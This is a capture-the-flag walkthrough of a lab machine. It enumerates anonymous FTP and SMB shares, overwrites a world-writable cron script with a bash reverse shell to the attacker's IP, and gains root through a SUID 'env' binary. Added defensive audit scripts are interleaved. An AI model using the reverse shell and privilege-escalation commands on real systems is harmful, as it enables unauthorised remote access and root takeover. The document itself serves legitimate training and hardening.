Enumeration

Nmap

┌──(alen㉿kali)-[~/Downloads]
└─$ nmap -p- --min-rate 5000 10.10.73.218           
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 10:20 +04
Warning: 10.10.73.218 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.73.218
Host is up (0.15s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
13114/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds


┌──(alen㉿kali)-[~/Downloads]
└─$ nmap -A -p 21,22,139,445 10.10.73.218 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 10:21 +04
Nmap scan report for 10.10.73.218
Host is up (0.14s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.14.100.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]

22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2025-05-21T06:21:49+00:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-05-21T06:21:49
|_  start_date: N/A

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   142.45 ms 10.14.0.1
2   142.68 ms 10.10.73.218

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.13 seconds

FTP Enumeration

┌──(alen㉿kali)-[~/Downloads]
└─$ ftp 10.10.73.218         
Connected to 10.10.73.218.
220 NamelessOne's FTP Server!
Name (10.10.73.218:alen): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||44207|)
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||8195|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1032 May 21 06:23 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||9807|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
100% |*********************************************************************|   314        4.40 MiB/s    00:00 ETA
226 Transfer complete.
314 bytes received in 00:00 (2.04 KiB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||55656|)
150 Opening BINARY mode data connection for removed_files.log (1032 bytes).
100% |*********************************************************************|  1032       15.62 MiB/s    00:00 ETA
226 Transfer complete.
1032 bytes received in 00:00 (6.51 KiB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||9283|)
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
100% |*********************************************************************|    68        1.64 KiB/s    00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.35 KiB/s)
ftp> 

From the Nmap scan we found that anonymous FTP login is allowed, and after logging in we were able to retrieve three files from the FTP server.

Among them is clean.sh, a bash script that runs every minute, so we may be able to put a reverse shell into it and get a connection back.

┌──(alen㉿kali)-[~/Downloads]
└─$ cat clean.sh         
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
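From a defender's point of view the script above is the whole problem on this box: clean.sh is world-writable (-rwxr-xrwx in the FTP listing), it sits in a world-writable directory (drwxrwxrwx), and it is executed unattended every minute. The POSIX shell function below is an added example, not part of the original writeup, that checks a script scheduled by cron for exactly those conditions. It assumes GNU coreutils stat (Linux); the fixture files it creates under a temporary directory are constructed for the demonstration and copy the permissions seen in the listing.

```shell
#!/bin/sh
# Added example (not from the writeup): flag scripts that cron runs unattended
# when an unprivileged user could change what gets executed.
# Assumption: GNU coreutils `stat -c` (Linux); modes are read as octal digits.

# check_cron_script PATH
# Returns 0 if PATH looks safe to run unattended, 1 otherwise.
# Each finding is printed on its own line.
check_cron_script() {
    script=$1
    rc=0
    if [ ! -f "$script" ]; then
        echo "MISSING: $script"
        return 1
    fi

    # %a prints the permission bits as octal digits, e.g. 757 for -rwxr-xrwx.
    # Extracting single digits with decimal arithmetic is fine here.
    mode=$(stat -c '%a' "$script")
    other=$(( mode % 10 ))
    group=$(( (mode / 10) % 10 ))
    # Within one digit, bit value 2 is the write bit.
    if [ $(( other & 2 )) -ne 0 ]; then
        echo "WORLD-WRITABLE: $script (mode $mode)"
        rc=1
    fi
    if [ $(( group & 2 )) -ne 0 ]; then
        echo "GROUP-WRITABLE: $script (mode $mode, group $(stat -c '%G' "$script"))"
        rc=1
    fi

    # A world-writable parent directory without the sticky bit lets anyone
    # delete and recreate the file, so the file's own mode no longer matters.
    dir=$(dirname "$script")
    dmode=$(stat -c '%a' "$dir")
    dother=$(( dmode % 10 ))
    sticky=$(( (dmode / 1000) % 2 ))
    if [ $(( dother & 2 )) -ne 0 ] && [ "$sticky" -eq 0 ]; then
        echo "WORLD-WRITABLE DIR: $dir (mode $dmode)"
        rc=1
    fi
    return $rc
}

# --- constructed fixtures mirroring the FTP listing above --------------------
FIXDIR=$(mktemp -d)
trap 'rm -rf "$FIXDIR"' EXIT
mkdir -p "$FIXDIR/scripts"
printf '#!/bin/bash\necho "Running cleanup script:  nothing to delete"\n' > "$FIXDIR/scripts/clean.sh"
chmod 757 "$FIXDIR/scripts/clean.sh"   # -rwxr-xrwx, as clean.sh is on the box
chmod 777 "$FIXDIR/scripts"            # drwxrwxrwx, as /var/ftp/scripts is
printf '#!/bin/sh\necho ok\n' > "$FIXDIR/good.sh"
chmod 755 "$FIXDIR/good.sh"            # -rwxr-xr-x inside a private (0700) directory

for s in "$FIXDIR/scripts/clean.sh" "$FIXDIR/good.sh"; do
    if check_cron_script "$s"; then
        echo "OK: $s"
    fi
done
```

On a real host you would feed it the script paths referenced from /etc/crontab, /etc/cron.d and the user crontabs; the fixture loop stands in for that here. Note also that the script's own logic never deletes anything: `[ $tmp_files=0 ]` is a one-word string test that is always true, which is why removed_files.log only ever contains the "nothing to delete" line.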

We can actually see the output of the script in the removed_files.log file:

┌──(alen㉿kali)-[~/Downloads]
└─$ cat removed_files.log
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete

The third file, to_do.txt, is a to-do note, which is not useful to us:

┌──(alen㉿kali)-[~/Downloads]
└─$ cat to_do.txt
I really need to disable the anonymous login...it's really not safe
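That note names the root cause. As an added example that is not from the writeup, the POSIX shell functions below audit a vsftpd.conf for anonymous access and, worse, anonymous write access, the combination that allows clean.sh to be replaced. The option names are real vsftpd.conf options and the defaults applied for absent options follow the vsftpd.conf man page; the three configuration files are constructed for the demonstration, since the box's actual vsftpd.conf is not on the page.

```shell
#!/bin/sh
# Added example (not from the writeup): report vsftpd settings that let
# anonymous users log in and modify files on the server.

# vsftpd_opt CONF OPTION DEFAULT
# Prints the value of OPTION in CONF (last occurrence wins) or DEFAULT when absent.
# Lines starting with '#' never match, so commented-out options are ignored.
vsftpd_opt() {
    conf=$1; opt=$2; default=$3
    val=$(sed -n "s/^[[:space:]]*$opt=\(.*\)$/\1/p" "$conf" | tail -n 1 | tr -d '[:space:]')
    if [ -z "$val" ]; then
        echo "$default"
    else
        echo "$val"
    fi
}

# is_yes VALUE: vsftpd accepts YES/yes/Yes for boolean options.
is_yes() {
    [ "$(printf '%s' "$1" | tr '[:lower:]' '[:upper:]')" = YES ]
}

# audit_vsftpd_conf CONF
# Returns 0 when anonymous access is off, 1 when anonymous users can log in
# read-only, 2 when anonymous users can also write. Prints one line per finding.
# Defaults: anonymous_enable=YES, every write-related option NO (per the man page).
audit_vsftpd_conf() {
    conf=$1
    rc=0
    anon=$(vsftpd_opt "$conf" anonymous_enable YES)
    write=$(vsftpd_opt "$conf" write_enable NO)
    upload=$(vsftpd_opt "$conf" anon_upload_enable NO)
    mkdir_=$(vsftpd_opt "$conf" anon_mkdir_write_enable NO)
    other=$(vsftpd_opt "$conf" anon_other_write_enable NO)

    if is_yes "$anon"; then
        rc=1
        echo "anonymous login enabled (anonymous_enable=$anon)"
        # The anon_* write options only take effect when write_enable is on.
        if is_yes "$write"; then
            if is_yes "$upload"; then echo "anonymous upload enabled (anon_upload_enable=YES)"; rc=2; fi
            if is_yes "$mkdir_"; then echo "anonymous mkdir enabled (anon_mkdir_write_enable=YES)"; rc=2; fi
            if is_yes "$other";  then echo "anonymous delete/rename/append enabled (anon_other_write_enable=YES)"; rc=2; fi
        fi
    fi
    return $rc
}

# --- constructed configurations --------------------------------------------
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed: a configuration consistent with what the box lets us do.
cat > "$WORK/weak.conf" <<'EOF'
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_other_write_enable=YES
anon_root=/var/ftp
EOF

# Constructed: anonymous read-only (still undesirable, but no write path).
cat > "$WORK/readonly.conf" <<'EOF'
listen=YES
anonymous_enable=yes
write_enable=NO
EOF

# Constructed: hardened, no anonymous access at all.
cat > "$WORK/hardened.conf" <<'EOF'
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
# anon_* options are irrelevant once anonymous_enable=NO
EOF

for c in "$WORK/weak.conf" "$WORK/readonly.conf" "$WORK/hardened.conf"; do
    echo "== $c"
    audit_vsftpd_conf "$c" || echo "severity: $?"
done
```

The return code is graded on purpose: a monitoring job can treat 1 as a policy warning and 2 as an incident, which matches what the to-do note and the writable scripts directory on this box show.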

SMB Enumeration

┌──(alen㉿kali)-[~/Downloads]
└─$ smbclient -L //10.10.73.218                                
Password for [WORKGROUP\alen]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        pics            Disk      My SMB Share Directory for Pics
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            ANONYMOUS
┌──(alen㉿kali)-[~/Downloads]
└─$ smbclient //10.10.73.218/pics
Password for [WORKGROUP\alen]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 17 15:11:34 2020
  ..                                  D        0  Thu May 14 05:59:10 2020
  corgo2.jpg                          N    42663  Tue May 12 04:43:42 2020
  puppos.jpeg                         N   265188  Tue May 12 04:43:42 2020

                20508240 blocks of size 1024. 13303292 blocks available
smb: \> get corgo2.jpg 
getting file corgo2.jpg of size 42663 as corgo2.jpg (26.6 KiloBytes/sec) (average 26.6 KiloBytes/sec)
smb: \> get puppos.jpeg 
getting file puppos.jpeg of size 265188 as puppos.jpeg (78.7 KiloBytes/sec) (average 61.9 KiloBytes/sec)
smb: \> exit

We enumerated SMB with smbclient, but did not find anything useful.

Next we can try to gain access to the system by uploading a bash reverse shell.

Exploitation – Reverse Shell

We are going to replace the contents of clean.sh with a bash reverse shell one-liner and upload the modified file back to the FTP server:

┌──(alen㉿kali)-[~/Downloads]
└─$ cat clean.sh               
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/10.14.100.15/4444 <&1'

Make sure you also have a listener set up on the port:

┌──(alen㉿kali)-[~/Downloads]
└─$ nc -nlvp 4444

After a minute we got the reverse shell:

┌──(alen㉿kali)-[~/Downloads]
└─$ nc -nlvp 4444      
listening on [any] 4444 ...
connect to [10.14.100.15] from (UNKNOWN) [10.10.73.218] 59654
bash: cannot set terminal process group (13166): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ 

Privilege Escalation – SUID

namelessone@anonymous:~$ find / -type f -perm -u=s -ls 2>/dev/null
find / -type f -perm -u=s -ls 2>/dev/null
       66     40 -rwsr-xr-x   1 root     root        40152 Oct 10  2019 /snap/core/8268/bin/mount
       80     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /snap/core/8268/bin/ping
       81     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /snap/core/8268/bin/ping6
       98     40 -rwsr-xr-x   1 root     root        40128 Mar 25  2019 /snap/core/8268/bin/su
      116     27 -rwsr-xr-x   1 root     root        27608 Oct 10  2019 /snap/core/8268/bin/umount
     2665     71 -rwsr-xr-x   1 root     root        71824 Mar 25  2019 /snap/core/8268/usr/bin/chfn
     2667     40 -rwsr-xr-x   1 root     root        40432 Mar 25  2019 /snap/core/8268/usr/bin/chsh
     2743     74 -rwsr-xr-x   1 root     root        75304 Mar 25  2019 /snap/core/8268/usr/bin/gpasswd
     2835     39 -rwsr-xr-x   1 root     root        39904 Mar 25  2019 /snap/core/8268/usr/bin/newgrp
     2848     53 -rwsr-xr-x   1 root     root        54256 Mar 25  2019 /snap/core/8268/usr/bin/passwd
     2958    134 -rwsr-xr-x   1 root     root       136808 Oct 11  2019 /snap/core/8268/usr/bin/sudo
     3057     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3427    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
     6462    105 -rwsr-sr-x   1 root     root              106696 Dec  6  2019 /snap/core/8268/usr/lib/snapd/snap-confine
     7636    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/8268/usr/sbin/pppd
       66     40 -rwsr-xr-x   1 root     root               40152 Jan 27  2020 /snap/core/9066/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/9066/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/9066/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/9066/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Jan 27  2020 /snap/core/9066/bin/umount
     2670     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/9066/usr/bin/chfn
     2672     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/9066/usr/bin/chsh
     2748     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/9066/usr/bin/gpasswd
     2840     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/9066/usr/bin/newgrp
     2853     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/9066/usr/bin/passwd
     2963    134 -rwsr-xr-x   1 root     root              136808 Jan 31  2020 /snap/core/9066/usr/bin/sudo
     3062     42 -rwsr-xr--   1 root     systemd-resolve    42992 Nov 29  2019 /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3432    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/9066/usr/lib/openssh/ssh-keysign
     6470    109 -rwsr-xr-x   1 root     root              110792 Apr 10  2020 /snap/core/9066/usr/lib/snapd/snap-confine
     7646    386 -rwsr-xr--   1 root     dip               394984 Feb 11  2020 /snap/core/9066/usr/sbin/pppd
   131150     28 -rwsr-xr-x   1 root     root               26696 Mar  5  2020 /bin/umount
   131140     32 -rwsr-xr-x   1 root     root               30800 Aug 11  2016 /bin/fusermount
   131191     64 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /bin/ping
   131084     44 -rwsr-xr-x   1 root     root               43088 Mar  5  2020 /bin/mount
   131207     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /bin/su
  1050325    100 -rwsr-xr-x   1 root     root              100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   919490     44 -rwsr-xr--   1 root     messagebus         42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   923989    108 -rwsr-sr-x   1 root     root              109432 Oct 30  2019 /usr/lib/snapd/snap-confine
   919683     16 -rwsr-xr-x   1 root     root               14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   919497     12 -rwsr-xr-x   1 root     root               10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   919679    428 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   919144     60 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /usr/bin/passwd
   918992     36 -rwsr-xr-x   1 root     root               35000 Jan 18  2018 /usr/bin/env
   919017     76 -rwsr-xr-x   1 root     root               75824 Mar 22  2019 /usr/bin/gpasswd
   919128     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newuidmap
   919127     40 -rwsr-xr-x   1 root     root               40344 Mar 22  2019 /usr/bin/newgrp
   918924     44 -rwsr-xr-x   1 root     root               44528 Mar 22  2019 /usr/bin/chsh
   919126     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newgidmap
   918922     76 -rwsr-xr-x   1 root     root               76496 Mar 22  2019 /usr/bin/chfn
   919269    148 -rwsr-xr-x   1 root     root              149080 Jan 31  2020 /usr/bin/sudo
   919305     20 -rwsr-xr-x   1 root     root               18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   918871     52 -rwsr-sr-x   1 daemon   daemon             51464 Feb 20  2018 /usr/bin/at
   919164     24 -rwsr-xr-x   1 root     root               22520 Mar 27  2019 /usr/bin/pkexec

As we were unable to look into sudo misconfigurations, we went ahead with SUID enumeration and found that env is listed on GTFOBins with a SUID-bit privilege escalation.

namelessone@anonymous:~$ /usr/bin/env /bin/sh -p
/usr/bin/env /bin/sh -p
whoami
root
cd /root
ls
root.txt
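The find output above is long because every snap core image ships its own copies of the usual setuid binaries, which makes the one odd entry (/usr/bin/env) easy to miss by eye. As an added example that is not part of the writeup, the POSIX shell functions below compare such a listing against a saved baseline of expected setuid paths and print only the additions. The listing lines are copied from the output above; the baseline is constructed for the demonstration (the paths in it are setuid on a stock Ubuntu 18.04 install).

```shell
#!/bin/sh
# Added example (not from the writeup): diff the setuid files on a host
# against a baseline and print the ones that are new.
# A live listing is produced with the same command used in the writeup:
#   find / -type f -perm -u=s -ls 2>/dev/null > current.ls
# The baseline is one expected path per line, taken from a known-good build.

# suid_paths LISTING
# Extract the path column (last field) from `find -ls` output, sorted and unique.
# Assumption: paths contain no whitespace (true for the listing above).
suid_paths() {
    awk '{ print $NF }' "$1" | sort -u
}

# suid_diff BASELINE LISTING
# Print each setuid path present in LISTING but absent from BASELINE.
# Returns 1 when at least one such path exists, 0 otherwise.
suid_diff() {
    baseline=$1; listing=$2
    sorted=$(mktemp)
    sort -u "$baseline" > "$sorted"          # comm needs both inputs sorted
    new=$(suid_paths "$listing" | comm -13 "$sorted" -)
    rm -f "$sorted"
    if [ -n "$new" ]; then
        printf '%s\n' "$new"
        return 1
    fi
    return 0
}

# --- constructed fixtures ----------------------------------------------------
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# A few lines of the box's own `find -ls` output from above.
cat > "$WORK/current.ls" <<'EOF'
   131150     28 -rwsr-xr-x   1 root     root               26696 Mar  5  2020 /bin/umount
   131084     44 -rwsr-xr-x   1 root     root               43088 Mar  5  2020 /bin/mount
   131207     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /bin/su
   919144     60 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /usr/bin/passwd
   918992     36 -rwsr-xr-x   1 root     root               35000 Jan 18  2018 /usr/bin/env
   919269    148 -rwsr-xr-x   1 root     root              149080 Jan 31  2020 /usr/bin/sudo
   919164     24 -rwsr-xr-x   1 root     root               22520 Mar 27  2019 /usr/bin/pkexec
EOF

# Constructed baseline: setuid paths expected on a stock Ubuntu 18.04 install.
# Deliberately unsorted; suid_diff sorts it.
cat > "$WORK/baseline.txt" <<'EOF'
/usr/bin/sudo
/bin/mount
/bin/umount
/bin/su
/usr/bin/passwd
/usr/bin/pkexec
EOF

if suid_diff "$WORK/baseline.txt" "$WORK/current.ls"; then
    echo "no unexpected setuid files"
else
    echo "^ unexpected setuid files: check which package owns each (dpkg -S) and why it is setuid"
fi
```

Running this from a cron job that mails or logs any non-empty diff would have surfaced the setuid bit on /usr/bin/env as soon as it was set, which is considerably earlier than the point at which someone runs GTFOBins against the host.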